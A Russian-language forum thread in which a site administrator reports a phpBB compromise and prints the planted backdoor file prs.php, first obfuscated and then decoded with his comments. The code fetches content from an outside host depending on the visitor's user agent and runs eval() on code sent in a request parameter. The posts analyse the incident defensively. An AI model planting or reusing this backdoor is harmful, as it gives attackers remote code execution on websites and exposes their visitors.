roboforum.ru

неработало. Это оно и было?
тоесть ковыряние на тему мобилкоробофорума...

Не это на соседнем ресурсе коллеги поставили Yandex Server
эта гадость скушала все место (вроде гигов 10 было) и все встало колом

мдя ))

Вот это называется пекоселось. Наглухо так..
Дядя Сетар, подумаешь на тему Тапталк?

подумаю, отчего же нет
я правда пока не знаю что это такое, но на каникулах буду разбираться

setar писал(а):подумаю, отчего же нет
я правда пока не знаю что это такое, но на каникулах буду разбираться

http://www.tapatalk.com/ - Да пожалуйста. Всё во имя и на благо, таксказать))).

Шапка опять припухла малясь?

а уж в окне отправки сообщений как всё припухло! О_о

А у меня чего-то аватарки не отображаются

И вылетает автоматизация каждый раз

Kitam1n писал(а):Шапка опять припухла малясь?

похоже на взлом - измененяи идут из библиотек форума.
как отойду от праздника буду разбираться

Итак, нарыл интересненького.
Во первых печально, но форум был взломан (через стандартные дырки phpbb, они пока остались, но я слежу за ними и скоро буду обновляться.)

технические детали:
на форум был внедрен файл forum/umil/style/prs.php
со следующим содержимым:

Код: Выделить всё • Развернуть

<?php 
 $x12="\x63ur\154_\x69\156\151\x74"; $x13="c\165\x72\x6c\137\163\x65\x74\x6f\160\x74"; $x14="\143\x75\x72l_e\170e\143"; $x15="\x63\x75rl\x5fcl\157s\x65"; $x16="\145v\x61\154"; $x17="\146\x69\x6c\x65\x5f\x67\145\x74\x5fc\157\x6e\x74e\156\164s"; $x18="\x66\x75\x6ec\x74\151o\156\137\145\170\x69\163\x74\163"; $x19="\151\156\151\137g\145\164"; $x1a="\x70r\x65\x67_m\141\164\143h"; $x1b="\x73\164ri\x70\x73\154\141s\150\x65\x73"; $x1c="\x75r\x6c\145\x6e\x63\157d\145"; 
error_reporting(0);$x0b = "\x68\x74tp\072\x2f\x2f\x79\157t\142\157\x6e\165s\056\x69\156\146o\057\x69nd\145xa\x74\157\x722\0716\x37\x32\x34/ge\x74\x2e\x70h\x70"; $x0c = "Be\156";if ($x1a("\x2f(\171a\x6e\x64\x65\x78\x7c\x67o\157g\x6c\145\051\x2f\x69", $_SERVER['HTTP_USER_AGENT'])) {$x0d = $x1c("\150\x74\x74\160:\x2f\x2f".$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI']);$x0e = $x1c($_SERVER['HTTP_USER_AGENT']);$x0f = $x0b."?\151\x64\x3d".$x0d."\046\143\x68\141\x72\163e\164\075\165&b\x6f\x74=".$x0e; if($x19("a\154lo\x77\137\x75\x72\x6c\x5f\x66\157p\x65\156") == 1) {echo $x17($x0f); } elseif($x18('curl_init')) {$x10 = $x12($x0f);$x13($x10, CURLOPT_HEADER, FALSE);$x13($x10, CURLOPT_RETURNTRANSFER, TRUE);$x11 = $x14($x10);$x15($x10); echo $x11;} } $x0f = $x0b."\077\143\x6f\x64\x65\075\x63\157\144\x65\046\x62\x6f\164\075".$x0e;if($x19("a\x6c\154\x6f\167\137u\162\154\137\146\157\x70\145n") == 1) { echo $x17($x0f);}elseif($x18('curl_init')) { $x10 = $x12($x0f);$x13($x10, CURLOPT_HEADER, FALSE);$x13($x10, CURLOPT_RETURNTRANSFER, TRUE);$x11 = $x14($x10);$x15($x10); echo $x11;}if($_REQUEST["\143"] == $x0c) $x16($x1b($_REQUEST["\x63\157\x64\145"])); ?>

Эта шифровка для пытливого ума превращается в такую программу:
(комментарии мои)

Код: Выделить всё • Развернуть

<?php
 // отключены сообщения об ошибках
 error_reporting(0);
 
 if (preg_match("/(yandex|google)/i", $_SERVER['HTTP_USER_AGENT'])) 
    { // если смотрит яндекс или гугл
      $url = "http://yotbonus.info/indexator296724/get.php?id=http://roboforum.ru/forum/umil/style/prs.php&charset=u&bot=".urlencode($_SERVER['HTTP_USER_AGENT']);
       if(ini_get("allow_url_fopen") == 1) 
         { // если разрешена функция allow_url_fopen
            echo file_get_contents($url);
         } elseif (function_exists('curl_init')) 
         { // если присутствует функция curl_init
            curl_setopt(curl_init($url), CURLOPT_HEADER, FALSE);
            curl_setopt(curl_init($url), CURLOPT_RETURNTRANSFER, TRUE);
            $result = curl_exec(curl_init($url));
            curl_close(curl_init($url));
            echo $result;
         }
   }
// остальным показываем нижеследующее 
 $url = "http://yotbonus.info/indexator296724/get.php?code=code&bot=".urlencode($_SERVER['HTTP_USER_AGENT']);
 if (ini_get("allow_url_fopen") == 1)
    { // если разрешена функция allow_url_fopen
      echo file_get_contents($url);
   } elseif (function_exists('curl_init'))
   { 
      curl_setopt(curl_init($url), CURLOPT_HEADER, FALSE);
      curl_setopt(curl_init($url), CURLOPT_RETURNTRANSFER, TRUE);
      $result = curl_exec(curl_init($url));
      curl_close(curl_init($url));
      echo $result;
   }

// авторский запрос кода ?
 if($_REQUEST["c"] == Ben) eval(stripslashes($_REQUEST["code"]));
 ?>

что делает эта программа ? :
будучи внедренной на сайт может возвращать некоторый код в зависимости от браузера пользователя, или указки хозяина "ботнета"
я проверил на эмуляции разных типовых браузеров
в ответ для ботов яндекса и гугла
вставляется код <p></p>
для остальных два минуса -- или пусто (для эксплорера родного win98)

Что там могло еще появляться может быть известно только хозяину и пострадавшим
Извиняйте если что ...

P.S. правильная бумага уже пошла в органы

Добавлено спустя 4 минуты 29 секунд:
хорошая статья по теме : http://habrahabr.ru/company/xakep/blog/130792/

а может просто намек "закрой дырку" ?

Duhas, представь, что приходишь к себе домой, в гараж, в свой офис, на склад или ещё куда, а на полу записка "идиот, смени замки". это разве секрет, что подавляющее большинство замков элементарно открывются? с сайтами или компами всё точно так же - иногда это может вызывать зевоту или улыбку аля "ну молодец, спасобнай на прочтение пары страниц с советами ввести в поле парольки единичку или как поискать дырки и как их потом можно заюзать, а дальше то что?". а может такой финт и не понравиться (а хоть просто настроение плохое будет) и при всей некомпетентности (в общем, хотя есть и приятные исключения) органов и кучи прочих досадных моментов таки можно прикольно огрести. это к тому, что есть куча более нормальных способов сообщить о чём-то и даже если нет реации, то это не значит, что можно что-то там демонстрировать без разрешения, доказывать (себе?) и т.д. просто предупредил, а дальше это проблемы хозяина ресурса, иначе проблемы легко могут начаться у доброжелателя.
п.с. кста за исследование уязвимостей в зависимости от того, как это всё будет происходить, можно огрести.

никому наш форум как цель для взлома не интересен, его рассматривают как обычный планктон которым питаются информационные монстры в виде ботнетов.
заражение тоже вероятнее всего в автоматическом режиме осуществлено.
автор ботнета просто изучил руками на аналогичном форуме рецепт взлома и добавил очередной "крючек" в обойму уязвимостей используемых для размножения